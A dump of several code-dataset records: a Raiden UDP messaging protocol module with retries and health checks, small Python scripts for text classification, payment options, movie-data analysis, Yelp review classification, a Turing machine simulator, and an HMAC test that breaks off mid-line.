of the `events`, this value\n must not be reused if the clearing behavior is used.\n \"\"\"\n first_finished = Event()\n\n if not all(isinstance(e, _AbstractLinkable) for e in events):\n raise ValueError('all events must be linkable')\n\n for event in events:\n event.rawlink(lambda _: first_finished.set())\n\n return first_finished\n\n\ndef timeout_exponential_backoff(retries, timeout, maximum):\n \"\"\" Timeouts generator with an exponential backoff strategy.\n\n Timeouts start spaced by `timeout`, after `retries` exponentially increase\n the retry delays until `maximum`, then maximum is returned indefinitely.\n \"\"\"\n yield timeout\n\n tries = 1\n while tries < retries:\n tries += 1\n yield timeout\n\n while timeout < maximum:\n timeout = min(timeout * 2, maximum)\n yield timeout\n\n while True:\n yield maximum\n\n\ndef retry(protocol, data, receiver_address, event_stop, timeout_backoff):\n \"\"\" Send data until it's acknowledged.\n\n Exits when the first of the following happen:\n\n - The packet is acknowledged.\n - Event_stop is set.\n - The iterator timeout_backoff runs out of values.\n\n Returns:\n bool: True if the message was acknowledged, False otherwise.\n \"\"\"\n\n async_result = protocol.send_raw_with_result(\n data,\n receiver_address,\n )\n\n event_quit = event_first_of(\n async_result,\n event_stop,\n )\n\n for timeout in timeout_backoff:\n\n if event_quit.wait(timeout=timeout) is True:\n break\n\n protocol.send_raw_with_result(\n data,\n receiver_address,\n )\n\n return async_result.ready()\n\n\ndef wait_recovery(event_stop, event_healthy):\n event_first_of(\n event_stop,\n event_healthy,\n ).wait()\n\n if event_stop.is_set():\n return\n\n # There may be multiple threads waiting, do not restart them all at\n # once to avoid message flood.\n gevent.sleep(random.random())\n\n\ndef retry_with_recovery(\n protocol,\n data,\n receiver_address,\n event_stop,\n event_healthy,\n event_unhealthy,\n backoff):\n \"\"\" Send data while the node is healthy until it's acknowledged.\n\n Note:\n backoff must be an infinite iterator, otherwise this task will\n become a hot loop.\n \"\"\"\n\n # The underlying unhealthy will be cleared, care must be taken to properly\n # clear stop_or_unhealthy too.\n stop_or_unhealthy = event_first_of(\n event_stop,\n event_unhealthy,\n )\n\n acknowledged = False\n while not event_stop.is_set() and not acknowledged:\n\n # Packets must not be sent to an unhealthy node, nor should the task\n # wait for it to become available if the message has been acknowledged.\n if event_unhealthy.is_set():\n wait_recovery(\n event_stop,\n event_healthy,\n )\n\n # Assume wait_recovery returned because unhealthy was cleared and\n # continue execution, this is safe to do because event_stop is\n # checked below.\n stop_or_unhealthy.clear()\n\n if event_stop.is_set():\n return\n\n acknowledged = retry(\n protocol,\n data,\n receiver_address,\n\n # retry will stop when this event is set, allowing this task to\n # wait for recovery when the node becomes unhealthy or to quit if\n # the stop event is set.\n stop_or_unhealthy,\n\n # Intentionally reusing backoff to restart from the last\n # timeout/number of iterations.\n backoff,\n )\n\n return acknowledged\n\n\ndef single_queue_send(\n protocol,\n receiver_address,\n queue,\n event_stop,\n event_healthy,\n event_unhealthy,\n message_retries,\n message_retry_timeout,\n message_retry_max_timeout):\n\n \"\"\" Handles a single message queue for `receiver_address`.\n\n Notes:\n - This task must be the only consumer of queue.\n - This task can be killed at any time, but the intended usage is to stop it\n with the event_stop.\n - If there are many queues for the same receiver_address, it is the\n caller's responsibility to not start them together to avoid congestion.\n - This task assumes the endpoint is never cleared after it's first known.\n If this assumption changes the code must be updated to handle unknown\n addresses.\n \"\"\"\n\n # A NotifyingQueue is required to implement cancelability, otherwise the\n # task cannot be stoped while the greenlet waits for an element to be\n # inserted in the queue.\n if not isinstance(queue, NotifyingQueue):\n raise ValueError('queue must be a NotifyingQueue.')\n\n # Reusing the event, clear must be carefully done\n data_or_stop = event_first_of(\n queue,\n event_stop,\n )\n\n # Wait for the endpoint registration or to quit\n event_first_of(\n event_healthy,\n event_stop,\n ).wait()\n\n while True:\n data_or_stop.wait()\n\n if event_stop.is_set():\n return\n\n # The queue is not empty at this point, so this won't raise Empty.\n # This task being the only consumer is a requirement.\n data = queue.peek(block=False)\n\n backoff = timeout_exponential_backoff(\n message_retries,\n message_retry_timeout,\n message_retry_max_timeout,\n )\n\n acknowledged = retry_with_recovery(\n protocol,\n data,\n receiver_address,\n event_stop,\n event_healthy,\n event_unhealthy,\n backoff,\n )\n\n if acknowledged:\n queue.get()\n\n # Checking the length of the queue does not trigger a\n # context-switch, so it's safe to assume the length of the queue\n # won't change under our feet and when a new item will be added the\n # event will be set again.\n if not queue:\n data_or_stop.clear()\n\n if event_stop.is_set():\n return\n\n\ndef healthcheck(\n protocol,\n receiver_address,\n event_stop,\n event_healthy,\n event_unhealthy,\n nat_keepalive_retries,\n nat_keepalive_timeout,\n nat_invitation_timeout,\n ping_nonce):\n\n \"\"\" Sends a periodical Ping to `receiver_address` to check its health. \"\"\"\n\n # The state of the node is unknown, the events are set to allow the tasks\n # to do work.\n protocol.set_node_network_state(\n receiver_address,\n NODE_NETWORK_UNKNOWN,\n )\n\n # Always call `clear` before `set`, since only `set` does context-switches\n # it's easier to reason about tasks that are waiting on both events.\n\n # Wait for the end-point registration or for the node to quit\n try:\n protocol.get_host_port(receiver_address)\n except UnknownAddress:\n event_healthy.clear()\n event_unhealthy.set()\n\n backoff = timeout_exponential_backoff(\n nat_keepalive_retries,\n nat_keepalive_timeout,\n nat_invitation_timeout,\n )\n sleep = next(backoff)\n\n while not event_stop.wait(sleep):\n try:\n protocol.get_host_port(receiver_address)\n except UnknownAddress:\n sleep = next(backoff)\n else:\n break\n\n # Don't wait to send the first Ping and to start sending messages if the\n # endpoint is known\n sleep = 0\n event_unhealthy.clear()\n event_healthy.set()\n\n while not event_stop.wait(sleep):\n sleep = nat_keepalive_timeout\n\n ping_nonce['nonce'] += 1\n data = protocol.get_ping(\n ping_nonce['nonce'],\n )\n\n # Send Ping a few times before setting the node as unreachable\n acknowledged = retry(\n protocol,\n data,\n receiver_address,\n event_stop,\n [nat_keepalive_timeout] * nat_keepalive_retries,\n )\n\n if event_stop.is_set():\n return\n\n if not acknowledged:\n # The node is not healthy, clear the event to stop all queue\n # tasks\n protocol.set_node_network_state(\n receiver_address,\n NODE_NETWORK_UNREACHABLE,\n )\n event_healthy.clear()\n event_unhealthy.set()\n\n # Retry until recovery, used for:\n # - Checking node status.\n # - Nat punching.\n acknowledged = retry(\n protocol,\n data,\n receiver_address,\n event_stop,\n repeat(nat_invitation_timeout),\n )\n\n if acknowledged:\n event_unhealthy.clear()\n event_healthy.set()\n protocol.set_node_network_state(\n receiver_address,\n NODE_NETWORK_REACHABLE,\n )\n\n\nclass RaidenProtocol(object):\n \"\"\" Encode the message into a packet and send it.\n\n Each message received is stored by hash and if it is received twice the\n previous answer is resent.\n\n Repeat sending messages until an acknowledgment is received or the maximum\n number of retries is hit.\n \"\"\"\n\n def __init__(\n self,\n transport,\n discovery,\n raiden,\n retry_interval,\n retries_before_backoff,\n nat_keepalive_retries,\n nat_keepalive_timeout,\n nat_invitation_timeout):\n\n self.transport = transport\n self.discovery = discovery\n self.raiden = raiden\n\n self.retry_interval = retry_interval\n self.retries_before_backoff = retries_before_backoff\n\n self.nat_keepalive_retries = nat_keepalive_retries\n self.nat_keepalive_timeout = nat_keepalive_timeout\n self.nat_invitation_timeout = nat_invitation_timeout\n\n self.event_stop = Event()\n\n self.channel_queue = dict() # TODO: Change keys to the channel address\n self.greenlets = list()\n self.addresses_events = dict()\n self.nodeaddresses_networkstatuses = defaultdict(lambda: NODE_NETWORK_UNKNOWN)\n\n # Maps the echohash of received and *sucessfully* processed messages to\n # its Ack, used to ignored duplicate messages and resend the Ack.\n self.receivedhashes_to_acks = dict()\n\n # Maps the echohash to a SentMessageState\n self.senthashes_to_states = dict()\n\n # Maps the addresses to a dict with the latest nonce (using a dict\n # because python integers are immutable)\n self.nodeaddresses_to_nonces = dict()\n\n cache = cachetools.TTLCache(\n maxsize=50,\n ttl=CACHE_TTL,\n )\n cache_wrapper = cachetools.cached(cache=cache)\n self.get_host_port = cache_wrapper(discovery.get)\n\n def start(self):\n self.transport.start()\n\n def stop_and_wait(self):\n # Stop handling incoming packets, but don't close the socket. The\n # socket can only be safely closed after all outgoing tasks are stopped\n self.transport.stop_accepting()\n\n # Stop processing the outgoing queues\n self.event_stop.set()\n gevent.wait(self.greenlets)\n\n # All outgoing tasks are stopped. Now it's safe to close the socket. At\n # this point there might be some incoming message being processed,\n # keeping the socket open is not useful for these.\n self.transport.stop()\n\n # Set all the pending results to False\n for waitack in self.senthashes_to_states.itervalues():\n waitack.async_result.set(False)\n\n def get_health_events(self, receiver_address):\n \"\"\" Starts a healthcheck taks for `receiver_address` and returns a\n HealthEvents with locks to react on its current state.\n \"\"\"\n if receiver_address not in self.addresses_events:\n self.start_health_check(receiver_address)\n\n return self.addresses_events[receiver_address]\n\n def start_health_check(self, receiver_address):\n \"\"\" Starts a task for healthchecking `receiver_address` if there is not\n one yet.\n \"\"\"\n if receiver_address not in self.addresses_events:\n ping_nonce = self.nodeaddresses_to_nonces.setdefault(\n receiver_address,\n {'nonce': 0}, # HACK: Allows the task to mutate the object\n )\n\n events = HealthEvents(\n event_healthy=Event(),\n event_unhealthy=Event(),\n )\n\n self.addresses_events[receiver_address] = events\n\n self.greenlets.append(gevent.spawn(\n healthcheck,\n self,\n receiver_address,\n self.event_stop,\n events.event_healthy,\n events.event_unhealthy,\n self.nat_keepalive_retries,\n self.nat_keepalive_timeout,\n self.nat_invitation_timeout,\n ping_nonce,\n ))\n\n def get_channel_queue(self, receiver_address, token_address):\n key = (\n receiver_address,\n token_address,\n )\n\n if key in self.channel_queue:\n return self.channel_queue[key]\n\n queue = NotifyingQueue()\n self.channel_queue[key] = queue\n\n events = self.get_health_events(receiver_address)\n\n self.greenlets.append(gevent.spawn(\n single_queue_send,\n self,\n receiver_address,\n queue,\n self.event_stop,\n events.event_healthy,\n events.event_unhealthy,\n self.retries_before_backoff,\n self.retry_interval,\n self.retry_interval * 10,\n ))\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'new queue created for',\n node=pex(self.raiden.address),\n token=pex(token_address),\n to=pex(receiver_address),\n )\n\n return queue\n\n def send_async(self, receiver_address, message):\n if not isaddress(receiver_address):\n raise ValueError('Invalid address {}'.format(pex(receiver_address)))\n\n if isinstance(message, (Ack, Ping)):\n raise ValueError('Do not use send for Ack or Ping messages')\n\n # Messages that are not unique per receiver can result in hash\n # collision, e.g. Secret messages. The hash collision has the undesired\n # effect of aborting message resubmission once /one/ of the nodes\n # replied with an Ack, adding the receiver address into the echohash to\n # avoid these collisions.\n messagedata = message.encode()\n echohash = sha3(messagedata + receiver_address)\n\n if len(messagedata) > UDP_MAX_MESSAGE_SIZE:\n raise ValueError(\n 'message size exceeds the maximum {}'.format(UDP_MAX_MESSAGE_SIZE)\n )\n\n # All messages must be ordered, but only on a per channel basis.\n token_address = getattr(message, 'token', '')\n\n # Ignore duplicated messages\n if echohash not in self.senthashes_to_states:\n async_result = AsyncResult()\n self.senthashes_to_states[echohash] = SentMessageState(\n async_result,\n receiver_address,\n )\n\n queue = self.get_channel_queue(\n receiver_address,\n token_address,\n )\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'SENDING MESSAGE',\n to=pex(receiver_address),\n node=pex(self.raiden.address),\n message=message,\n echohash=pex(echohash),\n )\n\n queue.put(messagedata)\n else:\n waitack = self.senthashes_to_states[echohash]\n async_result = waitack.async_result\n\n return async_result\n\n def send_and_wait(self, receiver_address, message, timeout=None):\n \"\"\"Sends a message and wait for the response ack.\"\"\"\n async_result = self.send_async(receiver_address, message)\n return async_result.wait(timeout=timeout)\n\n def maybe_send_ack(self, receiver_address, ack_message):\n \"\"\" Send ack_message to receiver_address if the transport is running. \"\"\"\n if not isaddress(receiver_address):\n raise ValueError('Invalid address {}'.format(pex(receiver_address)))\n\n if not isinstance(ack_message, Ack):\n raise ValueError('Use maybe_send_ack only for Ack messages')\n\n messagedata = ack_message.encode()\n self.receivedhashes_to_acks[ack_message.echo] = (receiver_address, messagedata)\n self._maybe_send_ack(*self.receivedhashes_to_acks[ack_message.echo])\n\n def _maybe_send_ack(self, receiver_address, messagedata):\n \"\"\" ACK must not go into the queue, otherwise nodes will deadlock\n waiting for the confirmation.\n \"\"\"\n host_port = self.get_host_port(receiver_address)\n\n # ACKs are sent at the end of the receive method, after the message is\n # sucessfully processed. It may be the case that the server is stopped\n # after the message is received but before the ack is sent, under that\n # circumstance the udp socket would be unavaiable and then an exception\n # is raised.\n #\n # This check verifies the udp socket is still available before trying\n # to send the ack. There must be *no context-switches after this test*.\n if self.transport.server.started:\n self.transport.send(\n self.raiden,\n host_port,\n messagedata,\n )\n\n def get_ping(self, nonce):\n \"\"\" Returns a signed Ping message.\n\n Note: Ping messages don't have an enforced ordering, so a Ping message\n with a higher nonce may be acknowledged first.\n \"\"\"\n message = Ping(nonce)\n self.raiden.sign(message)\n message_data = message.encode()\n\n return message_data\n\n def send_raw_with_result(self, data, receiver_address):\n \"\"\" Sends data to receiver_address and returns an AsyncResult that will\n be set once the message is acknowledged.\n\n Always returns same AsyncResult instance for equal input.\n \"\"\"\n host_port = self.get_host_port(receiver_address)\n echohash = sha3(data + receiver_address)\n\n if echohash not in self.senthashes_to_states:\n async_result = AsyncResult()\n self.senthashes_to_states[echohash] = SentMessageState(\n async_result,\n receiver_address,\n )\n else:\n async_result = self.senthashes_to_states[echohash].async_result\n\n if not async_result.ready():\n self.transport.send(\n self.raiden,\n host_port,\n data,\n )\n\n return async_result\n\n def set_node_network_state(self, node_address, node_state):\n self.nodeaddresses_networkstatuses[node_address] = node_state\n\n def receive(self, data):\n if len(data) > UDP_MAX_MESSAGE_SIZE:\n log.error('receive packet larger than maximum size', length=len(data))\n return\n\n # Repeat the ACK if the message has been handled before\n echohash = sha3(data + self.raiden.address)\n if echohash in self.receivedhashes_to_acks:\n return self._maybe_send_ack(*self.receivedhashes_to_acks[echohash])\n\n message = decode(data)\n\n if isinstance(message, Ack):\n waitack = self.senthashes_to_states.get(message.echo)\n\n if waitack is None:\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'ACK FOR UNKNOWN ECHO',\n node=pex(self.raiden.address),\n echohash=pex(message.echo),\n )\n\n else:\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'ACK RECEIVED',\n node=pex(self.raiden.address),\n receiver=pex(waitack.receiver_address),\n echohash=pex(message.echo),\n )\n\n waitack.async_result.set(True)\n\n elif isinstance(message, Ping):\n if ping_log.isEnabledFor(logging.DEBUG):\n ping_log.debug(\n 'PING RECEIVED',\n node=pex(self.raiden.address),\n echohash=pex(echohash),\n message=message,\n sender=pex(message.sender),\n )\n\n ack = Ack(\n self.raiden.address,\n echohash,\n )\n\n self.maybe_send_ack(\n message.sender,\n ack,\n )\n\n elif isinstance(message, SignedMessage):\n if log.isEnabledFor(logging.INFO):\n log.info(\n 'MESSAGE RECEIVED',\n node=pex(self.raiden.address),\n echohash=pex(echohash),\n message=message,\n message_sender=pex(message.sender)\n )\n\n try:\n self.raiden.on_message(message, echohash)\n\n # only send the Ack if the message was handled without exceptions\n ack = Ack(\n self.raiden.address,\n echohash,\n )\n\n try:\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'SENDING ACK',\n node=pex(self.raiden.address),\n to=pex(message.sender),\n echohash=pex(echohash),\n )\n\n self.maybe_send_ack(\n message.sender,\n ack,\n )\n except (InvalidAddress, UnknownAddress) as e:\n log.debug(\"Couldn't send the ACK\", e=e)\n\n except (UnknownAddress, InvalidNonce, TransferWhenClosed, TransferUnwanted) as e:\n log.DEV('maybe unwanted transfer', e=e)\n\n except (UnknownTokenAddress, InvalidLocksRoot) as e:\n if log.isEnabledFor(logging.WARN):\n log.warn(str(e))\n\n elif log.isEnabledFor(logging.ERROR):\n log.error(\n 'Invalid message',\n message=data.encode('hex'),\n )\n","sub_path":"raiden/network/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":24753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"614208333","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nfrom TrainingDataManager import TrainingData \nimport Classifiter\nimport jieba\nimport SmartPath as sp\n\nSEP\t\t\t\t= ' '\t\t\t\t\t\t\t#统一分隔符\nTRAIN_SET\t\t= sp.path('TrainingSet.txt')\t#训练集\nSTOPWORD_DIC\t= sp.path('stop_dict.txt')\t\t#停用词字典\nTEST_SET\t\t= sp.path('TestSet.txt')\t\t#测试集\nNB_FILE\t\t\t= sp.path('NB_RESULT.txt')\t\t#NB结果\nRO_FILE\t\t\t= sp.path('RO_RESULT.txt')\t\t#Rocchio结果\n\ntd = TrainingData(TRAIN_SET, STOPWORD_DIC, 100, SEP)\t#初始化训练集实例\nnb = Classifiter.NaiveBayes(td)\t#NB分类器实例\nro = Classifiter.Rocchio(td)\t#Rocchio分类器实例\n\nClassifiter.evaluate(TEST_SET, NB_FILE, nb, SEP)\nClassifiter.evaluate(TEST_SET, RO_FILE, ro, SEP)\n\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"430068336","text":"# Desafio 044\n\nfrom time import sleep\n\npreço = float(input('Informe o valor do produto: R$ '))\nprint('-=-'*6, 'Condições de Pagamento', '-=-'*6, '''\\n\nOPÇÃO (1): À Vista no Dinheiro - 10% de Desconto.\nOPÇÃO (2): À Vista no Cartão de Crédito - 5% de Desconto.\nOPÇÃO (3): Parcelado no Cartão de Crédito - Até 2x sem Juros.\\n\nPressione 0 para sair.\\n''')\nprint('-=-'*20, '\\n')\nopção = int(input('Informe a opção desejada: '))\nprint('Processando...')\nsleep(2)\nif opção == 1:\n print('O valor final a ser pago pelo produto será de R${:.2f}.'.format(preço-(preço*0.1)))\nelif opção == 2:\n print('O valor final a ser pago pelo produto será de R${:.2f}.'.format(preço-(preço*0.05)))\nelif opção == 3:\n parcelas = int(input('Qual o número total de parcelas? '))\n print('Processando...')\n sleep(2)\n if 0 < parcelas <= 2:\n print('O valor final a ser pago será de R${:.2f}.'.format(preço))\n elif parcelas > 2:\n print('O valor final a ser pago será de R${:.2f}.'.format(preço+(preço*0.2)))\n else:\n print('Erro: número inválido de parcelas! Fim da execução.')\nelse:\n print('Aplicação encerrada.')\n","sub_path":"Mundo2/ex052.py","file_name":"ex052.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"247505208","text":"# encoding = utf8\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nmovie_data = pd.read_csv(\"./tmdb-movies.csv\")\n\nmovie_data = movie_data.dropna()\n\nsimple_data = movie_data[['id', 'popularity', 'budget', 'runtime', 'vote_average']]\n\n# print(movie_data.loc[list(range(20)) + list([47, 48])])\n# print('===========')\n# print(movie_data.loc[50:60, ['popularity']])\n# print('===========')\n# print(movie_data[movie_data['popularity'] > 5])\n# print('===========')\n# print(movie_data[(movie_data['popularity'] > 5) & (movie_data['release_year'] > 1996)])\n# print(movie_data.groupby('release_year').agg({\"revenue\": np.average}))\n# array = np.array(movie_data)\n# print(movie_data.groupby('director').agg({\"popularity\": np.average}).sort_values('popularity', ascending=False))\n\n\n# bin_edges = np.arange(0, pop_data['popularity'].max() + 1 / 4, 1 / 4)\n# plt.hist(data=pop_data, x='original_title', bins = bin_edges)\n#\n# # y_means = pd.to_datetime(df['indate']) - pd.to_datetime(df['dob'])\n#\n# y_means = movie_data['revenue'] - movie_data['budget']\n\n# #评分和票房高的电影的导演排行\n# top_votes =movie_data[movie_credit['vote_average'] >=8].sort_values(by = 'vote_average', ascending = False)\n# top_votes[top_votes.isnull()]\n# #删除空值\n# top_votes = top_votes[[ 'director', 'vote_average' , 'revenue']].dropna()\n# top_revenue = top_votes.sort_values(by = 'revenue', ascending = False)\n# top_revenue = top_revenue[[ 'revenue','director']]\n# top_revenue1 = top_revenue.groupby('director')['revenue'].mean().sort_values(ascending = True)\n#\n# # 图表可视化\n# plt.figure(figsize = (15,5))\n# plt.subplot(1,2,1)\n# ax1 =top_revenue1.tail(10).plot.barh(width=0.8,color = '#228B22')\n# plt.xticks(fontsize=13 ,rotation = 0)\n# plt.yticks(fontsize=13)movie_data['popularity'].max\n# plt.xlabel('票房',fontsize = 13)\n# plt.ylabel('导演', fontsize = 13)\n# plt.grid(True)\n# plt.title('高票房高评分导演排行榜', fontsize = 15)\nmovie_data['profit'] = movie_data['revenue'] - movie_data['budget']\nmovie_data.index = movie_data['release_year']\nnew_array = movie_data.groupby('release_year', as_index=True)['profit'].sem()\n\nprofit_data = pd.DataFrame(new_array)\nprofit_data.sort_values(by='release_year', ascending=True).plot(kind='barh')\n\nplt.title('各种电影类型的平均利润')\nplt.xlabel('平均利润(美元)')\nplt.ylabel('电影类型')\nplt.grid(True)\nplt.show()\n","sub_path":"P2_Explore_Movie_Dataset/learn.py","file_name":"learn.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"321394500","text":"import json\nimport pandas as pd \nimport string\n\nimport nltk\n\nfrom nltk.corpus import stopwords\n#nltk.download('stopwords')\n\nfrom nltk.stem import WordNetLemmatizer\n\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom sklearn.metrics import confusion_matrix,accuracy_score\n\nreview_text = []\nreview_stars = []\nwith open('yelp_review_part1.json') as f:\n\tfor line in f:\n\t\tjson_line = json.loads(line)\n\t\treview_text.append(json_line[\"text\"])\n\t\treview_stars.append(json_line[\"stars\"])\n\ndataset = pd.DataFrame(data = {'text': review_text, 'stars': review_stars})#, columns=['text', 'stars'])\n\nprint(dataset.shape)\n\ndataset = dataset[0:3000]\n\nprint(dataset.shape)\n\ndataset = dataset[(dataset['stars']==1)|(dataset['stars']==3)|(dataset['stars']==5)]\n\nprint(dataset.shape)\n\ndata = dataset['text']\ntarget = dataset['stars']\n\nlemmatizer = WordNetLemmatizer()\n\ndef pre_processing(text):\n\ttext_processed = [char for char in text if char not in string.punctuation]\n\ttext_processed = ''.join(text_processed)\n\treturn [lemmatizer.lemmatize(word.lower()) for word in text_processed.split() if word.lower() not in stopwords.words('english')]\n\nprint(pre_processing(\"This is some text. Hello!!! This is pretending to be a review. Reviews are funny.\"))\n\ncount_vectorize_transformer = CountVectorizer(analyzer=pre_processing).fit(data)\n\nprint(count_vectorize_transformer.get_feature_names())\n\ndata = count_vectorize_transformer.transform(data)\n\ndata_training, data_test, target_training, target_test = train_test_split(data, target, test_size = 0.25)\n\nmachine = MultinomialNB()\n\nmachine.fit(data_training, target_training)\n\npredictions = machine.predict(data_test)\n\nprint(confusion_matrix(target_test, predictions))\nprint(accuracy_score(target_test, predictions))\n\n\ntest_review = \"It's a horrible resturant. It's expensive!!!!\"\ntest_review_transformed = count_vectorize_transformer.transform([test_review])\nprediction = machine.predict(test_review_transformed)\nprediction_prob = machine.predict_proba(test_review_transformed)\nprint(prediction)\nprint(prediction_prob)\n\ntest_review = \"Baby Shark Duh duh duh duh duh\"\ntest_review_transformed = count_vectorize_transformer.transform([test_review])\nprediction = machine.predict(test_review_transformed)\nprediction_prob = machine.predict_proba(test_review_transformed)\nprint(prediction)\nprint(prediction_prob)\n","sub_path":"train_yelp_review.py","file_name":"train_yelp_review.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"508122965","text":"def leArquivo():\r\n\twith open('entrada.txt', 'r') as file:\r\n\t\t#linha 1: (int) estados\r\n\t\testados = int(file.readline())\r\n\r\n\t\t#linha 2: (lista) terminais\r\n\t\tterminais = file.readline()\r\n\t\tterminais = terminais[2:]\r\n\t\tterminais = terminais.split()\r\n\r\n\t\t#linha 3: (lista) naoTerminais\r\n\t\tnaoTerminais = file.readline()\r\n\t\tnaoTerminais = naoTerminais[2:]\r\n\t\tnaoTerminais = naoTerminais.split()\r\n\r\n\t\t#linha 4: (int) aceitacao\r\n\t\taceitacao = int(file.readline())\r\n\r\n\r\n\t\t#linha 5: (int) numero de transicoes\r\n\t\tnumTransicoes = int(file.readline())\r\n\r\n\t\t#linha 6 a (numTransicoes + 6): (matriz de listas) definição das arestas do grafo que representa a maquina de turing\r\n\t\ttransicoes = []\r\n\t\tfor linha in range(numTransicoes):\r\n\t\t\ttemp = file.readline()\r\n\t\t\ttemp = temp.split()\r\n\t\t\ttransicoes.append(temp)\r\n\r\n\t\t#num cadeias a serem testadas: (int) numero de cadeias\r\n\t\tnumCadeias = int(file.readline())\r\n\r\n\t\t#cadeias a serem testadas: (lista) lista com as cadeias a serem testadas\r\n\t\tcadeias = []\r\n\t\tfor linha in range(numCadeias):\r\n\t\t\ttemp = file.readline()\r\n\t\t\tcadeias.append(temp.rstrip('\\n'))\r\n\t\r\n\t\treturn estados, terminais, naoTerminais, aceitacao, transicoes, cadeias\r\n\r\ndef printaCoisas(estados, terminais, naoTerminais, aceitacao, transicoes, cadeias):\r\n\r\n\tprint('estados = ')\r\n\tprint(str(estados))\r\n\tprint(' ')\r\n\r\n\tprint('terminais : ')\r\n\tprint(terminais)\r\n\tprint(' ')\r\n\r\n\tprint(\"não serminais (sigma'): \")\r\n\tprint(naoTerminais)\r\n\tprint(' ')\r\n\r\n\tprint('aceitacao = ')\r\n\tprint(str(aceitacao))\r\n\tprint(' ')\r\n\r\n\tprint('transicoes: ')\r\n\tprint(transicoes)\r\n\tprint(' ')\r\n\r\n\tprint('cadeias :')\r\n\tprint(cadeias)\r\n\tprint(' ')\r\n\r\ndef preparaGrafo(estados, transicoes):\r\n\tgraph = {}\r\n\tfor x in range(estados):\r\n\t\tgraph.setdefault(x,[])\r\n\r\n\tfor item in transicoes:\r\n\t\tkey = int(item[0])\r\n\t\ttempTransicoes = item[1:]\r\n\t\tgraph[key].append(tempTransicoes)\r\n\r\n\treturn graph\r\n\r\ndef testeCadeias(graph, posAtual, cadeia, estado):\r\n\r\n\tresultado = 0\r\n\tif estado == 5:\r\n\t\treturn 1\r\n\r\n\telse:\r\n\t\tfor lista in graph[estado]:\r\n\r\n\t\t\t#se existe instrucao para o que esta na cabeca de leitura:\r\n\t\t\tif(cadeia[posAtual] in lista): \r\n\t\t\t\tnewEstado = int(lista[1])\r\n\t\t\t\tescrever = lista[2]\r\n\t\t\t\tmovePara = lista[3]\r\n\t\t\telse:\r\n\t\t\t\tprint(\"não achou na lista\")\r\n\t\t\t\tcontinue\r\n\t\t\t\t\r\n\t\t\tnewCadeia = cadeia[:posAtual] + escrever + cadeia[posAtual+1:]\r\n\t\t\tif(movePara == 'R'):\r\n\t\t\t\tnewPosicao = posAtual + 1\r\n\t\t\telif(movePara == 'L'):\r\n\t\t\t\tnewPosicao = posAtual -1\r\n\t\t\telse:\r\n\t\t\t\tnewPosicao = posAtual\r\n\r\n\t\t\tprint(\"estado = \" + str(estado))\r\n\t\t\tprint('cadeia = ' + cadeia)\r\n\t\t\tprint('posicao atual = ' + str(posAtual))\r\n\t\t\tprint(\"move Para = \" + movePara)\r\n\t\t\tprint('nova cadeia = ' + newCadeia)\r\n\t\t\tprint('novo estado = ' + str(newEstado))\r\n\t\t\tprint('--------------')\r\n\r\n\r\n\t\t\tresultado = testeCadeias(graph, newPosicao, newCadeia, newEstado)\r\n\t\t\t\r\n\treturn resultado\r\n\r\nif __name__ == '__main__':\r\n\r\n\t# ----------------------- leitura e preparacao dos dados: ----------------\r\n\testados, terminais, naoTerminais, aceitacao, transicoes, cadeias = leArquivo()\r\n\r\n\t#printaCoisas(estados, terminais, naoTerminais, aceitacao, transicoes, cadeias)\r\n\r\n\tgraph = preparaGrafo(estados, transicoes)\r\n\r\n\t# ------------------------ começo do codigo em si ------------------------\r\n\testado = 0\r\n\tposAtual = 1\r\n\tnovaCadeia = ' ' + cadeias[0] + ' '\r\n\tresultado = testeCadeias(graph, posAtual, novaCadeia, estado)\r\n\t\"\"\"\r\n\tfor cadeia in cadeias:\r\n\t\tnovaCadeia = ' ' + cadeia + ' '\r\n\t\tresultado = testeCadeias(graph, posAtual, novaCadeia, estado)\r\n\t\tif resultado == 1:\r\n\t\t\tprint(\"DEU CERTO PORRA\")\r\n\t\"\"\"","sub_path":"itc/proBackup.py","file_name":"proBackup.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"599573109","text":"#! /usr/bin/python3\n\nimport logging\nimport hmac\nimport hashlib\n\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger(__name__)\n\ndef main():\n # hmac_key = bytes([112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131])\n # hmac_key = bytes.fromhex(\"707172737475767778797a7b7c7d7e7f80818283\")\n hmac_key = bytes.fromhex(\"DBBE277096160FF4CDA921EFCAFCFFAD\")\n\n # text = bytes([72, 101, 108, 108, 111, 32, 87, 111, 114, 108, 100])\n text = b\"Hello World\\0\"\n log.debug(\"{}\".format(len(text)))\n\n digest = hashlib.sha1\n # digest = hashlib.md5\n\n hmac_obj = hmac.new(key=hmac_key, msg=None, digestmod=digest)\n for i in range(2):\n log.debug(f\"Hmac update:{i}\")\n hmac_obj.update(text)\n\n log.debug(\"Hmac key size:{}\".format(len(hmac_key)))\n log.debug(\"Hmac size:{}\".format(hmac_obj.digest_size))\n hmc_res = 